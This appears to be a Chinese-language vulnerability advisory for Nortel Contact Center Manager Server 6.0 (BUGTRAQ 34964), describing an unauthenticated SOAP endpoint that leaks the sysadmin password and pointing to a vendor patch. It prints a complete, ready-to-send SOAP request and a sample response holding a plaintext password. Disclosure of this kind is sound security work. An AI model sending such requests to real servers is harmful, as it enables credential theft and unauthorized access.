受影响系统:
Nortel Networks Contact Center Manager Server 6.0
描述:
BUGTRAQ ID: 34964
Contact Center Manager Server(CCMS)是功能强大的呼叫中心解决方案。
CCMS提供了一个SOAP接口,该接口不需要授权,对某些请求可能会返回敏感信息。如果向sysadmin用户提交了以下SOAP请求:
—
POST /Common/WebServices/SOAPWrapperCommon/SOAPWrapperCommonWS.asmx
HTTP/1.1
Host: 10.1.2.3
Content-Type: text/xml; charset=utf-8
SOAPAction:
"http://SoapWrapperCommon.CCMA.Applications.Nortel.com/SOAPWrapperCommon_UsersWS_GetServers_Wrapper"
Content-Length: 661
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<SOAPWrapperCommon_UsersWS_GetServers_Wrapper
xmlns="http://SoapWrapperCommon.CCMA.Applications.Nortel.com">
<ccmaUserName>string</ccmaUserName>
<clientIP>string</clientIP>
<componentID>string</componentID>
<sessionID>string</sessionID>
<strUserID>string</strUserID>
<strPassword>string</strPassword>
</SOAPWrapperCommon_UsersWS_GetServers_Wrapper>
</soap:Body>
</soap:Envelope>
—
就可能返回以下的响应,其中包含有sysadmin用户的口令:
—
<rs:data>
<z:row ID=’0′ ServerName=’abcd01′ ServerIP=’10.1.2.3′
ServerDescription=’abcd01′ ServerUserID=’sysadmin’
ServerPassword=’pwd4hugo’
ServerType=’1′ SystemVersion=’6.0′ OpenQueue=’0′ HeteroNetworking=’0′
Network=’0′ ServerSWBuild=’4.4F’ ServerSULevel=’CCMS_6.0_SU_05′
ServerDPLevel=’CCMS_6.0_SUS_0503′ BasicIVR=’1′ GracePeriodState=’3′
RefreshIntervalsElapsed=’0’/>
</rs:data>
—
<*来源:Bernhard Mueller (research@sec-consult.com)
链接:http://marc.info/?l=bugtraq&m=124335568723386&w=2
http://www116.nortel.com/pub/repository/CLARIFY/DOCUMENT/2009/19/024777-01.pdf
*>
建议:
厂商补丁:
Nortel Networks
—————
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
0 条评论。